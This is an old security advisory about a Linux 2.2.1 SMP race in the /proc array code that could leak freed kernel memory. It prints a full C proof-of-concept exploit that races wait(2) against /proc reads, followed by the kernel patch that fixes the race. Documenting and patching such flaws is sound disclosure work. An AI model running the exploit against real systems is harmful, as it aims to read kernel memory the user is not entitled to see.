COMMAND

    kernel

SYSTEMS AFFECTED

    Linux 2.2.1

PROBLEM

    Andrea Arcangeli found following.   2.2.1 reintroduced a SMP  race
    in array.c.   The SMP  race is  that wait(2)  can free  the kernel
    stack of the zombie process while  array.c is using it.  Once  the
    page is  freed it  can be  reused, and  if it  get recycled before
    array.c has finished to use it, you could reconstruct part of  RAM
    that you should not be allowed to read (looking at /proc data) and
    array.c could  get in  problems during  its lifetime  (not checked
    this last but it's a guess).  In practice the window for the  race
    is small and you would need at least 3 CPU to reproduce this(???).
    The first CPU has to fork a process that will do only an _exit(2).
    Then has to wait that the forked process become a zombie, and once
    it's a  zombie it  has to  start a  /proc sniffer  that will  read
    /proc/zombiepid/stat on the other cpu.  This sniffer will save its
    contents to  a buffer  at the  first pass  and then  it will start
    reading /proc/../stat in loop and comparing it with the one  saved
    in the buffer, and it will then log the output of /proc/../stat if
    it will  be changed  compared with  the saved  data sample  in the
    buffer.  Once the sniffer is  at regime (the loop that search  for
    /proc changes is started) the task on the first CPU (the one  that
    forked the sniffer) has to do  a wait(2) so that the stack  of the
    zombie process will be released.   A bit before doing the  wait(2)
    you must eat all the  memory avaliable with a trashing  proggy and
    this last has  to run in  a new CPU  (so you need  at least a 3way
    smp).  Since this  last memory-trasher proggy will  start allocing
    tons  of  memory,  you'll  have  a  chance that the pages freed by
    wait(2) will  be realloced  by the  kernel before  the read of the
    /proc sniffer  will finish.   It's theorically  possible to  sniff
    data from  the kernel  exploiting the  /proc race  but it's really
    hard and only on some very parallel hardware.  Andrea also written
    a sample of exploit:

    /*
     * Copyright (C) 1999  Andrea Arcangeli
     * Linux-2.2.1 /proc SMP race sniffer
     */

    #include <stdio.h>
    #include <fcntl.h>
    #include <sched.h>
    #include <pthread.h>

    static volatile int pid = -1;
    static int prog_length;
    static pthread_mutex_t pid_lock = PTHREAD_MUTEX_INITIALIZER;
    static pthread_mutex_t zombie_lock = PTHREAD_MUTEX_INITIALIZER;

    static int get_current_pid(void)
    {
	    int __pid;
	    pthread_mutex_lock(&pid_lock);
	    __pid = pid;
	    pthread_mutex_unlock(&pid_lock);
	    return __pid;
    }

    static void * sniffer(void *dummy)
    {
	    int cache_pid = -1, fd = -1;
	    char str[50], buf[2000], sample[2000];

	    pthread_mutex_lock(&zombie_lock);
	    pthread_mutex_unlock(&zombie_lock);

	    for (;;)
	    {
		    int length_cmp;
		    if (get_current_pid() != cache_pid)
		    {
			    pthread_mutex_lock(&zombie_lock);
			    cache_pid = pid;
			    snprintf(str, 50, "/proc/%d/stat", cache_pid);
			    if (fd > 0)
				    close(fd);
			    fd = open(str, O_RDONLY|O_NONBLOCK);
			    if (fd > 0)
			    {
				    int length;
				    length = read(fd, &buf, 2000);
				    if (length > 0)
				    {
					    length_cmp = length;
					    memcpy(sample, buf, length);
					    sample[length-1] = 0;
				    }
			    }
			    pthread_mutex_unlock(&zombie_lock);
		    }

		    if (fd > 0)
		    {
			    int length;

			    lseek(fd, 0, SEEK_SET);
			    length = read(fd, &buf, 200);
			    buf[length-1] = 0;
			    if (length >= length_cmp && memcmp(buf, sample,
							       length_cmp))
				    printf("length %d, pid %d\n"
					   "original data: %s\n"
					   "modifyed data: %s\n",
					   length, cache_pid, sample, buf);
		    }
	    }
    }

    static int is_zombie(int __pid)
    {
	    char str[50], state;
	    FILE * status;
	    snprintf(str, 50, "/proc/%d/status", __pid);
	    status = fopen(str, "r");
	    if (!status)
	    {
		    perror("open");
		    exit(2);
	    }
	    fscanf(status, "%*s\t%*s\nState:\t%c", &state);
	    fclose(status);
	    if (state != 'Z')
		    return 0;
	    return 1;
    }

    int main(int argc, char *argv[])
    {
	    int dummy;
	    pthread_t task_struct_sniffer;

	    pthread_mutex_lock(&zombie_lock);

	    if (pthread_create(&task_struct_sniffer, NULL, sniffer, NULL))
	    {
		    perror("pthread_create");
		    exit(1);
	    }

	    for (;;)
	    {
		    int __pid = fork();
		    if (!__pid)
			    _exit(0);

		    while (!is_zombie(__pid));

		    pthread_mutex_lock(&pid_lock);
		    pid = __pid;
		    pthread_mutex_unlock(&pid_lock);

		    pthread_mutex_unlock(&zombie_lock);
		    usleep(1);
		    wait(&dummy);
		    pthread_mutex_lock(&zombie_lock);
	    }
	    pthread_mutex_unlock(&zombie_lock);
    }

SOLUTION

    Andrea hopes to have diffed  all the interesting changes from  his
    tree to 2.2.1  at the end  of this advisory.   If for some  reason
    the patch won't apply cleanly  or will not work don't  bother, but
    instead go in sync with his personal kernel tree to get this  race
    fixed at

	ftp://e-mind.com/pub/linux/arca-tree/2.2.1_arca-2.gz

    Now  he  fixed  all  races  with  a  zerocopy  approch (originally
    suggested by Linus that increments  the page count of the  process
    stack instead of doing the  copy, but it also assure  that array.c
    always use the mm it has  get before (with mmget())).  Works  fine
    here. Patch against 2.2.1:

    --- /tmp/array.c        Tue Feb  2 00:08:07 1999
    +++ linux/fs/proc/array.c       Mon Feb  1 23:51:51 1999
    @@ -389 +390,30 @@
    -static unsigned long get_phys_addr(struct task_struct * p, unsigned long ptr)
    +/*
    + * Caller must release_mm the mm_struct later.
    + * You don't get any access to init_mm.
    + */
    +static struct mm_struct * grab_mm(int pid)
    +{
    +       struct mm_struct * mm = NULL;
    +       struct task_struct * tsk;
    +
    +       read_lock(&tasklist_lock);
    +       tsk = find_task_by_pid(pid);
    +        /*
    +        * NOTE: this doesn't race because we are protected by the
    +        * big kernel lock. -arca
    +        */
    +       if (tsk && tsk->mm && tsk->mm != &init_mm)
    +               mmget(mm = tsk->mm);
    +       read_unlock(&tasklist_lock);
    +       if (mm)
    +               down(&mm->mmap_sem);
    +       return mm;
    +}
    +
    +static void release_mm(struct mm_struct *mm)
    +{
    +       up(&mm->mmap_sem);
    +       mmput(mm);
    +}
    +
    +static unsigned long get_phys_addr(struct mm_struct *mm, unsigned long ptr)
    @@ -395 +425 @@
    -       if (!p || !p->mm || ptr >= TASK_SIZE)
    +       if (ptr >= TASK_SIZE)
    @@ -398,2 +428,2 @@
    -       if (!p->mm->pgd) {
    -               printk("get_phys_addr: pid %d has NULL pgd!\n", p->pid);
    +       if (!mm->pgd) {
    +               printk(KERN_DEBUG "missing pgd for mm %p\n", mm);
    @@ -403 +433 @@
    -       page_dir = pgd_offset(p->mm,ptr);
    +       page_dir = pgd_offset(mm,ptr);
    @@ -425 +455 @@
    -static int get_array(struct task_struct *p, unsigned long start, unsigned long end, char * buffer)
    +static int get_array(struct mm_struct *mm, unsigned long start, unsigned long end, char * buffer)
    @@ -434 +464 @@
    -               addr = get_phys_addr(p, start);
    +               addr = get_phys_addr(mm, start);
    @@ -456,5 +486,2 @@
    -       struct task_struct *p;
    -
    -       read_lock(&tasklist_lock);
    -       p = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       struct mm_struct *mm;
    +       int res = 0;
    @@ -462,3 +489,6 @@
    -       if (!p || !p->mm)
    -               return 0;
    -       return get_array(p, p->mm->env_start, p->mm->env_end, buffer);
    +       mm = grab_mm(pid);
    +       if (mm) {
    +               res = get_array(mm, mm->env_start, mm->env_end, buffer);
    +               release_mm(mm);
    +       }
    +       return res;
    @@ -469 +499,2 @@
    -       struct task_struct *p;
    +       struct mm_struct *mm;
    +       int res = 0;
    @@ -471,6 +502,6 @@
    -       read_lock(&tasklist_lock);
    -       p = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    -       if (!p || !p->mm)
    -               return 0;
    -       return get_array(p, p->mm->arg_start, p->mm->arg_end, buffer);
    +       mm = grab_mm(pid);
    +       if (mm) {
    +               res = get_array(mm, mm->arg_start, mm->arg_end, buffer);
    +               release_mm(mm);
    +       }
    +       return res;
    @@ -725 +707 @@
    -static inline char * task_mem(struct task_struct *p, char *buffer)
    +static inline char * task_mem(struct mm_struct * mm, char *buffer)
    @@ -727,4 +709,2 @@
    -       struct mm_struct * mm = p->mm;
    -
    -       if (mm && mm != &init_mm) {
    -               struct vm_area_struct * vma = mm->mmap;
    +       if (mm) {
    +               struct vm_area_struct * vma;
    @@ -819,0 +800,39 @@
    +static struct task_struct *grab_task(int pid, struct mm_struct ** mm)
    +{
    +       struct task_struct *tsk = current;
    +
    +       *mm = NULL;
    +       read_lock(&tasklist_lock);
    +       tsk = find_task_by_pid(pid);
    +       if (tsk)
    +       {
    +               struct mm_struct * __mm;
    +               struct page * page = mem_map + MAP_NR(tsk);
    +               atomic_inc(&page->count);
    +               /*
    +                * NOTE: this doesn't race because we are protected
    +                * by the big kernel lock. -arca
    +                */
    +               __mm = tsk->mm;
    +               if (__mm && __mm != &init_mm)
    +               {
    +                       mmget(__mm);
    +                       *mm = __mm;
    +               }
    +       }
    +       read_unlock(&tasklist_lock);
    +       if (*mm)
    +               down(&(*mm)->mmap_sem);
    +
    +       return tsk;
    +}
    +
    +static void release_task(struct task_struct *tsk, struct mm_struct * mm)
    +{
    +       if (mm)
    +       {
    +               up(&mm->mmap_sem);
    +               mmput(mm);
    +       }
    +       free_pages((unsigned long) tsk, 1);
    +}
    @@ -825,4 +844,3 @@
    -
    -       read_lock(&tasklist_lock);
    -       tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       struct mm_struct * mm;
    +
    +       tsk = grab_task(pid, &mm);
    @@ -833 +851 @@
    -       buffer = task_mem(tsk, buffer);
    +       buffer = task_mem(mm, buffer);
    @@ -835,0 +854 @@
    +       release_task(tsk, mm);
    @@ -841,0 +861 @@
    +       struct mm_struct * mm;
    @@ -846,0 +867 @@
    +       int res;
    @@ -848,3 +869 @@
    -       read_lock(&tasklist_lock);
    -       tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       tsk = grab_task(pid, &mm);
    @@ -855,3 +874,4 @@
    -       if (tsk->mm && tsk->mm != &init_mm) {
    -               struct vm_area_struct *vma = tsk->mm->mmap;
    -               while (vma) {
    +       if (mm) {
    +               struct vm_area_struct *vma;
    +
    +               for (vma = mm->mmap; vma; vma = vma->vm_next) {
    @@ -859 +878,0 @@
    -                       vma = vma->vm_next;
    @@ -860,0 +880 @@
    +
    @@ -881 +901 @@
    -       return sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \
    +       res = sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \
    @@ -907 +927 @@
    -               tsk->mm ? tsk->mm->rss : 0, /* you might want to shift this left 3 */
    +               mm ? mm->rss : 0, /* you might want to shift this left 3 */
    @@ -909,3 +929,3 @@
    -               tsk->mm ? tsk->mm->start_code : 0,
    -               tsk->mm ? tsk->mm->end_code : 0,
    -               tsk->mm ? tsk->mm->start_stack : 0,
    +               mm ? mm->start_code : 0,
    +               mm ? mm->end_code : 0,
    +               mm ? mm->start_stack : 0,
    @@ -925,0 +946,3 @@
    +
    +       release_task(tsk, mm);
    +       return res;
    @@ -1003 +1025,0 @@
    -       struct task_struct *tsk;
    @@ -1004,0 +1027 @@
    +       struct mm_struct *mm;
    @@ -1006,7 +1029,3 @@
    -       read_lock(&tasklist_lock);
    -       tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    -       if (!tsk)
    -               return 0;
    -       if (tsk->mm && tsk->mm != &init_mm) {
    -               struct vm_area_struct * vma = tsk->mm->mmap;
    +       mm = grab_mm(pid);
    +       if (mm) {
    +               struct vm_area_struct * vma = mm->mmap;
    @@ -1015 +1034 @@
    -                       pgd_t *pgd = pgd_offset(tsk->mm, vma->vm_start);
    +                       pgd_t *pgd = pgd_offset(mm, vma->vm_start);
    @@ -1032,0 +1052 @@
    +               release_mm(mm);
    @@ -1070 +1089,0 @@
    -
    @@ -1074 +1093,2 @@
    -       struct task_struct *p;
    +       struct task_struct * p;
    +       struct mm_struct * mm;
    @@ -1079 +1098,0 @@
    -       int volatile_task;
    @@ -1091,3 +1110 @@
    -       read_lock(&tasklist_lock);
    -       p = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       p = grab_task(pid, &mm);
    @@ -1097 +1114 @@
    -       if (!p->mm || p->mm == &init_mm || count == 0)
    +       if (!mm || count == 0)
    @@ -1100,3 +1116,0 @@
    -       /* Check whether the mmaps could change if we sleep */
    -       volatile_task = (p != current || atomic_read(&p->mm->count) > 1);
    -
    @@ -1108 +1122 @@
    -       for (map = p->mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++)
    +       for (map = mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++)
    @@ -1179,6 +1192,0 @@
    -
    -               /* By writing to user space, we might have slept.
    -                * Stop the loop, to avoid a race condition.
    -                */
    -               if (volatile_task)
    -                       break;
    @@ -1190,0 +1199 @@
    +       release_task(p, mm);
    @@ -1202 +1211,2 @@
    -       struct task_struct * tsk = current ;
    +       struct task_struct * tsk;
    +       struct mm_struct * mm;
    @@ -1205,6 +1215,2 @@
    -       read_lock(&tasklist_lock);
    -       if (pid != tsk->pid)
    -               tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    -
    -       if (tsk == NULL)
    +       tsk = grab_task(pid, &mm);
    +       if (!tsk)
    @@ -1223,0 +1230 @@
    +       release_task(tsk, mm);